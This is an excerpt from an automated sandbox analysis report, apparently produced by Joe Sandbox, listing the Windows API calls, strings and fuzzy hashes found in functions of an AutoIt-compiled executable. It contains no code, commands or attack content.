                                                          • Opcode Fuzzy Hash: 9d6e80baecc8bb005cbfbfca5b95eaa72f7e38d313b03dcfbda4bfd09cf97946
                                                          • Instruction Fuzzy Hash: C0918D72008795AFD7229F64DC48A5B7BBDFF89321F100B29F5629A1E0D7B0E944CB52
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00362CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00362CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00362CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00362CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00362D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0039C43B
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0039C474
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0039C89D
                                                            • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 0039C8DA
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039C8F1
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C907
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
                                                          • Instruction ID: e26b407e7da92c6c6a05bc0dc00d1711e1c1aa01974e0e8128ca08820682128e
                                                          • Opcode Fuzzy Hash: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
                                                          • Instruction Fuzzy Hash: 3D129D30614641EFDF22CF24C884BAABBE5BF45300F569569F895CB6A2C771EC42CB91
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 003D74DE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003D759D
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003D75DB
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003D75ED
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003D7633
                                                          • GetClientRect.USER32(00000000,?), ref: 003D763F
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003D7683
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003D7692
                                                          • GetStockObject.GDI32(00000011), ref: 003D76A2
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003D76A6
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003D76B6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D76BF
                                                          • DeleteDC.GDI32(00000000), ref: 003D76C8
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003D76F4
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 003D770B
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003D7746
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003D775A
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 003D776B
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003D779B
                                                          • GetStockObject.GDI32(00000011), ref: 003D77A6
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003D77B1
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003D77BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
                                                          • Instruction ID: 37aba0aa763873870e99743a2ce73540a4e49df4eb2eccfb27bd1fb44205bbac
                                                          • Opcode Fuzzy Hash: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
                                                          • Instruction Fuzzy Hash: 46A18471A00615BFEB25DBA4DC49FAE777DEB09710F108215FA14AB2E0D7B0AD01CB64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003CAD1E
                                                          • GetDriveTypeW.KERNEL32(?,003EFAC0,?,\\.\,003EF910), ref: 003CADFB
                                                          • SetErrorMode.KERNEL32(00000000,003EFAC0,?,\\.\,003EF910), ref: 003CAF59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
                                                          • Instruction ID: c0f80f204004e6a5069744047aafc9990cdf08c7dcd52c94c954b9fff9d4ff24
                                                          • Opcode Fuzzy Hash: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
                                                          • Instruction Fuzzy Hash: 0251B3B0648A0D9B8B02DB20CD82FBD73A4EF48308B30855FF407EB690CA74AD41DB56
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: e353fae4cffc5d296cce980c810e5f9fc09de736b9734240276d10388187b2c4
                                                          • Instruction ID: eaccd9a74934b103b1d4003874998b834cf8663ee91c132ac638ac538f37f71e
                                                          • Opcode Fuzzy Hash: e353fae4cffc5d296cce980c810e5f9fc09de736b9734240276d10388187b2c4
                                                          • Instruction Fuzzy Hash: 8181E5B1640305AADF23BB61DC83FBF37A8AF15740F048025FD05AF19AEB61DA45D6A1
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003E9AD2
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003E9B8B
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 003E9BA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                          • Instruction ID: f652ae33a2dff04b3136a72607b81b3e7dbc169f982711e044422d8b7586a9e6
                                                          • Opcode Fuzzy Hash: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                          • Instruction Fuzzy Hash: 5902D2301042A1AFD726CF16C885BAABBE9FF89300F04872EF595DA2E1C775D945CB51
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 003EA903
                                                          • SetTextColor.GDI32(?,?), ref: 003EA907
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                          • GetSysColor.USER32(0000000F), ref: 003EA928
                                                          • CreateSolidBrush.GDI32(?), ref: 003EA92D
                                                          • GetSysColor.USER32(00000011), ref: 003EA945
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                          • SelectObject.GDI32(?,00000000), ref: 003EA964
                                                          • SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                          • SelectObject.GDI32(?,?), ref: 003EA97A
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003EAA14
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 003EAA32
                                                          • DrawFocusRect.USER32(?,?), ref: 003EAA3D
                                                          • GetSysColor.USER32(00000011), ref: 003EAA4B
                                                          • SetTextColor.GDI32(?,00000000), ref: 003EAA53
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003EAA67
                                                          • SelectObject.GDI32(?,003EA5FA), ref: 003EAA7E
                                                          • DeleteObject.GDI32(?), ref: 003EAA89
                                                          • SelectObject.GDI32(?,?), ref: 003EAA8F
                                                          • DeleteObject.GDI32(?), ref: 003EAA94
                                                          • SetTextColor.GDI32(?,?), ref: 003EAA9A
                                                          • SetBkColor.GDI32(?,?), ref: 003EAAA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 00cba71d905be99907bb8c101f0db3e0c18a1316f56c7813f0f8e4e61bbd910f
                                                          • Instruction ID: 50d1458001a82b424cee2a74a2b1d6dea80c7ad36ca65aa070025a3583d1a12d
                                                          • Opcode Fuzzy Hash: 00cba71d905be99907bb8c101f0db3e0c18a1316f56c7813f0f8e4e61bbd910f
                                                          • Instruction Fuzzy Hash: 7F514D71900658EFDF229FA5DC88EAE7B79EB48320F114225F911AB2E1D7B1A940DF50
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003E8AC1
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8AD2
                                                          • CharNextW.USER32(0000014E), ref: 003E8B01
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003E8B42
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003E8B58
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E8B69
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003E8B86
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003E8BD8
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003E8BEE
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E8C1F
                                                          • _memset.LIBCMT ref: 003E8C44
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003E8C8D
                                                          • _memset.LIBCMT ref: 003E8CEC
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003E8D16
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 003E8D6E
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 003E8E1B
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003E8E3D
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8E87
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003E8EB4
                                                          • DrawMenuBar.USER32(?), ref: 003E8EC3
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003E8EEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 7e788a712a083e91107fd94933b2143d672250f5aa2a1c585cae182e9409bb87
                                                          • Instruction ID: 9c01809681362f92dc6fd8ee9f62f50fadf93a971d1c08ae04aa98e3226b9e81
                                                          • Opcode Fuzzy Hash: 7e788a712a083e91107fd94933b2143d672250f5aa2a1c585cae182e9409bb87
                                                          • Instruction Fuzzy Hash: ECE183709002A8AFDF22DF51DC84EEE7B79EF05710F118266F919AA1D0DB709A81DF60
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 003E49CA
                                                          • GetDesktopWindow.USER32 ref: 003E49DF
                                                          • GetWindowRect.USER32(00000000), ref: 003E49E6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003E4A48
                                                          • DestroyWindow.USER32(?), ref: 003E4A74
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E4A9D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E4ABB
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E4AE1
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 003E4AF6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E4B09
                                                          • IsWindowVisible.USER32(?), ref: 003E4B29
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E4B44
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E4B58
                                                          • GetWindowRect.USER32(?,?), ref: 003E4B70
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 003E4B96
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 003E4BB0
                                                          • CopyRect.USER32(?,?), ref: 003E4BC7
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 003E4C32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                          • Instruction ID: e6f3e9d43c9eb8eb0b8c7b7e2224a475f0739ef4e9b977f5debd5132f856826b
                                                          • Opcode Fuzzy Hash: af2ae4cbb0ba1d5d0e821e0bd1127f867138a35df030712ffe13fa4f56c1a66e
                                                          • Instruction Fuzzy Hash: 13B19C70604390AFDB15DF65C884B6ABBE8FF88310F008A2DF5999B2A1D771EC05CB55
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003C44AC
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003C44D2
                                                          • _wcscpy.LIBCMT ref: 003C4500
                                                          • _wcscmp.LIBCMT ref: 003C450B
                                                          • _wcscat.LIBCMT ref: 003C4521
                                                          • _wcsstr.LIBCMT ref: 003C452C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003C4548
                                                          • _wcscat.LIBCMT ref: 003C4591
                                                          • _wcscat.LIBCMT ref: 003C4598
                                                          • _wcsncpy.LIBCMT ref: 003C45C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: 3c5584aace79f084933643bd4cd533918ced6022798e8bc38769a8890cdc652a
                                                          • Instruction ID: 66dccd518503e8a3bb17d9a3c42b9d48fedf45802a5dbfe21d7177ebccc87acf
                                                          • Opcode Fuzzy Hash: 3c5584aace79f084933643bd4cd533918ced6022798e8bc38769a8890cdc652a
                                                          • Instruction Fuzzy Hash: 2941D371A003007BDB17BA748C42FBF776CDF42710F1005AAF905EA1C2EA74AA0197A9
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 003628C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003628EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 003628F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 0036291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00362939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00362949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00362990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003629AE
                                                          • GetStockObject.GDI32(00000011), ref: 003629CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003629D5
                                                            • Part of subcall function 00362344: GetCursorPos.USER32(?), ref: 00362357
                                                            • Part of subcall function 00362344: ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                            • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000001), ref: 00362399
                                                            • Part of subcall function 00362344: GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00361256), ref: 003629FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: -es$AutoIt v3 GUI
                                                          • API String ID: 1458621304-1956769002
                                                          • Opcode ID: 628ded53a0f66efb821de22b6031943e9d17a133d18461951b6e69b873f13de5
                                                          • Instruction ID: 8945076a3ec82916408305ea3ce2c004ddb4cb636ce93b4c45370a8739cb87f0
                                                          • Opcode Fuzzy Hash: 628ded53a0f66efb821de22b6031943e9d17a133d18461951b6e69b873f13de5
                                                          • Instruction Fuzzy Hash: CCB18071600609DFDF26DFA8DC85BAE77B4FB48310F118225FA15AB2D4CBB49851CB54
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 003BA47A
                                                          • __swprintf.LIBCMT ref: 003BA51B
                                                          • _wcscmp.LIBCMT ref: 003BA52E
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BA583
                                                          • _wcscmp.LIBCMT ref: 003BA5BF
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 003BA5F6
                                                          • GetDlgCtrlID.USER32(?), ref: 003BA648
                                                          • GetWindowRect.USER32(?,?), ref: 003BA67E
                                                          • GetParent.USER32(?), ref: 003BA69C
                                                          • ScreenToClient.USER32(00000000), ref: 003BA6A3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 003BA71D
                                                          • _wcscmp.LIBCMT ref: 003BA731
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 003BA757
                                                          • _wcscmp.LIBCMT ref: 003BA76B
                                                            • Part of subcall function 0038362C: _iswctype.LIBCMT ref: 00383634
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                          • Instruction ID: 6e2b0b6292385114928e1dfb3262b5382f731e36f3678dafd7203fcfd68fbdbb
                                                          • Opcode Fuzzy Hash: 292361d21e89dd18cc83b7f40f7efc8cdd2345e8a6f23091e9e85a9c099c8b00
                                                          • Instruction Fuzzy Hash: 76A1C471204F06AFD716DF64C885BEAB7E8FF44358F004529FA99C6590DB30EA45CB92
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 003BAF18
                                                          • _wcscmp.LIBCMT ref: 003BAF29
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 003BAF51
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 003BAF6E
                                                          • _wcscmp.LIBCMT ref: 003BAF8C
                                                          • _wcsstr.LIBCMT ref: 003BAF9D
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003BAFD5
                                                          • _wcscmp.LIBCMT ref: 003BAFE5
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 003BB00C
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003BB055
                                                          • _wcscmp.LIBCMT ref: 003BB065
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 003BB08D
